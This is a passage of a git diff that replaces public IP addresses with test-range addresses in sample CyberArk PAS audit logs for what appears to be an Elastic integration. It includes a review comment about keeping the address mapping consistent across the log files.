diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/273_remove_owner.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/273_remove_owner.log
index ea1458e5874..6a20dacc257 100644
--- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/273_remove_owner.log
+++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/273_remove_owner.log
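Review bot: Nothing in the package records which addresses the sample logs may use or how the original ones were mapped, so the next capture of fresh logs will reintroduce arbitrary public IPs; the replacement here (81.32.170.205 → 67.43.156.13, 35.192.121.42 → 67.43.156.14) is applied with the same mapping in the 273_remove_owner.log and 294_store_password.log hunks, including the `File` path and the `Address` CAProperty in the 294 record, which keeps events from the same station correlatable across files. I would add a short README next to the sample logs under `_dev/deploy/docker/sample_logs/` saying `Sample logs only use addresses from the supported test subset (e.g. 67.43.156.13-15); keep the per-source mapping stable so events from one station stay correlatable across files.` The 300_psm_connect.log hunk also carries these addresses inside `ExtraDetails` (`DstHost=…;SrcHost=…`) and in the `raw` string, and its new side is outside this view, so please confirm those embedded occurrences were rewritten with the same mapping; otherwise one record could show a replaced `Station` beside an original `SrcHost`. The old values appear to be real ISP and cloud endpoints, so a fixed test range also keeps such addresses out of the public repository.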
@@ -1 +1 @@
-<5>1 2021-03-10T17:59:33Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:33","IsoTimestamp":"2021-03-10T17:59:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"273","Desc":"Remove Owner","Severity":"Info","Issuer":"Administrator","Action":"Remove Owner","SourceUser":"Administrator","TargetUser":"","Safe":"PSMSessions","File":"","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Owner","GatewayStation":""}}}
+<5>1 2021-03-10T17:59:33Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:59:33","IsoTimestamp":"2021-03-10T17:59:33Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"273","Desc":"Remove Owner","Severity":"Info","Issuer":"Administrator","Action":"Remove Owner","SourceUser":"Administrator","TargetUser":"","Safe":"PSMSessions","File":"","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Remove Owner","GatewayStation":""}}}
diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/294_store_password.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/294_store_password.log
index 2ea7c7cf132..8309f516cd2 100644
--- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/294_store_password.log
+++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/294_store_password.log
@@ -2,9 +2,9 @@ <5>1 2021-03-08T18:24:49Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 10:24:49","IsoTimestamp":"2021-03-08T18:24:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WinDesktopLocal-Address-adriansr","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"10.0.1.20"}}} <5>1 2021-03-08T19:20:02Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 08 11:20:02","IsoTimestamp":"2021-03-08T19:20:02Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDesktopLocal"},{"Name":"UserName","Value":"x_accountA"},{"Name":"Address","Value":"components"},{"Name":"ResetImmediately","Value":"ChangeTask"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"SequenceID","Value":"26"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"StartChangeNotBefore","Value":"1615231182"},{"Name":"GroupName","Value":"WindowsGroup"},{"Name":"LastSuccessChange","Value":"1614785704"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating 
System"},{"Name":"Index","Value":"1"},{"Name":"DualAccountStatus","Value":"Inactive"},{"Name":"VirtualUsername","Value":"virtual"}]}}}} <5>1 2021-03-10T14:38:57Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 06:38:57","IsoTimestamp":"2021-03-10T14:38:57Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Groups\\WindowsGroup","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WindowsDesktopLocalAccountsRotationalPolicy"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"LastSuccessChange","Value":"1615387136"},{"Name":"CurrInd","Value":"1"}]}}}} -<5>1 2021-03-10T17:58:06Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:06","IsoTimestamp":"2021-03-10T17:58:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSMServer","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":""}}} -<5>1 2021-03-10T22:17:26Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:26","IsoTimestamp":"2021-03-10T22:17:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store 
password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"35.192.121.42","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":""}}} +<5>1 2021-03-10T17:58:06Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 09:58:06","IsoTimestamp":"2021-03-10T17:58:06Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSMServer","Station":"67.43.156.13","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":""}}} +<5>1 2021-03-10T22:17:26Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 14:17:26","IsoTimestamp":"2021-03-10T22:17:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\PSM-ASR-CYBERARK-WI","Station":"67.43.156.14","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":""}}} <5>1 2021-03-10T23:39:25Z VAULT {"format":"elastic","version":"1.0","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 10 15:39:25","IsoTimestamp":"2021-03-10T23:39:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating 
System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountB","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDesktopLocal"},{"Name":"UserName","Value":"x_accountB"},{"Name":"Address","Value":"components"},{"Name":"ResetImmediately","Value":"ChangeTask"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"SequenceID","Value":"24"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"StartChangeNotBefore","Value":"1615419536"},{"Name":"GroupName","Value":"WindowsGroup"},{"Name":"LastSuccessChange","Value":"1614868762"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"Index","Value":"2"},{"Name":"DualAccountStatus","Value":"Inactive"},{"Name":"VirtualUsername","Value":"virtual"}]}}}} <5>1 2021-03-14T11:48:26Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 04:48:26\n 2021-03-14T11:48:26Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 294\n Store password\n Info\n PasswordManager\n Store password\n \n \n Test\n Root\\Groups\\WindowsGroup\n 10.0.1.20\n \n \n \n \n \n Store password\n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 04:48:26","IsoTimestamp":"2021-03-14T11:48:26Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Groups\\WindowsGroup","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store 
password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WindowsDesktopLocalAccountsRotationalPolicy"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"LastSuccessChange","Value":"1615722505"},{"Name":"CurrInd","Value":"2"}]}}}} <5>1 2021-03-15T10:12:21Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:12:21\n 2021-03-15T10:12:21Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 294\n Store password\n Info\n PasswordManager\n Store password\n \n \n Test\n Root\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA\n 10.0.1.20\n \n \n \n \n \n Store password\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:12:21","IsoTimestamp":"2021-03-15T10:12:21Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"PasswordManager","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"Test","File":"Root\\Operating System-WindowsDesktopLocalAccountsRotationalPolicy-10.0.1.20-x_accountA","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store 
password","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDesktopLocal"},{"Name":"UserName","Value":"x_accountA"},{"Name":"Address","Value":"components"},{"Name":"ResetImmediately","Value":"ChangeTask"},{"Name":"InProcess","Value":"ChangeTask"},{"Name":"SequenceID","Value":"27"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastTask","Value":"ChangeTask"},{"Name":"StartChangeNotBefore","Value":"1615754905"},{"Name":"GroupName","Value":"WindowsGroup"},{"Name":"LastSuccessChange","Value":"1615231204"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"Index","Value":"1"},{"Name":"DualAccountStatus","Value":"Inactive"},{"Name":"VirtualUsername","Value":"virtual"}]}}}} -<5>1 2021-03-15T13:13:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:13:01\n 2021-03-15T13:13:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 294\n Store password\n Info\n Administrator\n Store password\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 127.0.0.1\n \n \n \n \n \n Store password\n 10.0.1.20\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:13:01","IsoTimestamp":"2021-03-15T13:13:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store 
password","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615813465"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T13:13:01Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:13:01\n 2021-03-15T13:13:01Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 294\n Store password\n Info\n Administrator\n Store password\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 127.0.0.1\n \n \n \n \n \n Store password\n 10.0.1.20\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:13:01","IsoTimestamp":"2021-03-15T13:13:01Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"294","Desc":"Store password","Severity":"Info","Issuer":"Administrator","Action":"Store password","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"127.0.0.1","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"","Message":"Store 
password","GatewayStation":"10.0.1.20","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615813465"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/300_psm_connect.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/300_psm_connect.log index 74928df0a23..ce2f13e9d7d 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/300_psm_connect.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/300_psm_connect.log 
@@ -1,17 +1,17 @@ {"format":"elastic","version":"1.0","raw":"\n \n no\n Cyber-Ark\n Vault\n 11.6.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n Linux\n Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2\n 10.2.0.7\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n","syslog":{"audit_record":{"Rfc5424":"no","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.6.0000","MessageID":"300","IsoTimestamp":"2021-03-16T15:01:00Z","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"Linux","File":"Root\\Operating System-LINUX-SSH-radiussrv.cyberark.local-admin2","Station":"10.2.0.7","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=radiussrv.cyberark.local;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=35fac41e-22b5-11eb-83ca-000c297aae88;SrcHost=10.2.0.6;User=admin2;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"LINUX-SSH"},{"Name":"UserName","Value":"admin2"},{"Name":"Address","Value":"radiussrv.cyberark.local"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"CPMDisabled","Value":"No Reason"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"Customer","Value":"Tesla"}]}}}} -<5>1 2021-03-11T17:38:20Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:38:20\n 2021-03-11T17:38:20Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n 
ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:38:20","IsoTimestamp":"2021-03-11T17:38:20Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=87012dcc-8290-11eb-949e-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:46:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:46:56\n 2021-03-11T17:46:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:46:56","IsoTimestamp":"2021-03-11T17:46:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM 
Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=ba22b012-8291-11eb-b981-080027efd402;SrcHost=127.0.0.1;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:48:34Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:48:34\n 2021-03-11T17:48:34Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:48:34","IsoTimestamp":"2021-03-11T17:48:34Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=f6acbf00-8291-11eb-b9ba-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM 
Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:54:56Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:54:56\n 2021-03-11T17:54:56Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:54:56","IsoTimestamp":"2021-03-11T17:54:56Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=d8ff4d32-8292-11eb-b962-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T17:56:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 09:56:37\n 2021-03-11T17:56:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n 
Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 09:56:37","IsoTimestamp":"2021-03-11T17:56:37Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=173dd46a-8293-11eb-afcb-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-11T20:23:25Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 11 12:23:25\n 2021-03-11T20:23:25Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n PSM\n Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian\n 81.32.170.205\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;\n PSM Connect\n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 11 
12:23:25","IsoTimestamp":"2021-03-11T20:23:25Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"300","Desc":"PSM Connect","Severity":"Info","Issuer":"Administrator","Action":"PSM Connect","SourceUser":"","TargetUser":"","Safe":"PSM","File":"Root\\Operating System-UnixSSHKeys-34.123.103.115-adrian","Station":"81.32.170.205","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=ssh;PSMID=PSMServer;SessionID=988b22e8-82a7-11eb-83b9-080027efd402;SrcHost=10.0.2.2;User=adrian;","Message":"PSM Connect","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSHKeys"},{"Name":"UserName","Value":"adrian"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-14T13:49:37Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:37\n 2021-03-14T13:49:37Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 300\n PSM Connect\n Info\n Administrator\n PSM Connect\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n ApplicationType=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=81.32.170.205;User=testark;\n PSM Connect\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 